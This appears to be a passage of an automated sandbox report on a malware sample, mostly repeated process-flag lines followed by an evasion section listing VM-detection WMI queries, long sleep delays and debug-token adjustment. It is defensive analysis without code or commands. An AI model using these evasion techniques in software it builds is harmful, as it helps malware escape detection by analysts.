            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\boostProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeMemory allocated: 1AFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\boostMemory allocated: 1710000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boostMemory allocated: 1B2A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boostMemory allocated: 16D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boostMemory allocated: 1B2B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\boostThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\boostThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWindow / User API: threadDelayed 892Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeWindow / User API: threadDelayed 8921Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5058Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4741Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7965Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1606Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8062Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1529Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7814
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1813
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe TID: 8016Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 8062 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 1529 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 7814 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 1813 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Roaming\boost TID: 8108Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7200Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\boost TID: 2176Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\boostFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\boostFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\boostThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\boostThread delayed: delay time: 922337203685477
            Source: svchost.exe, 00000018.00000002.2528219790.000002A272A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2525223571.000002A26D42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BE40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
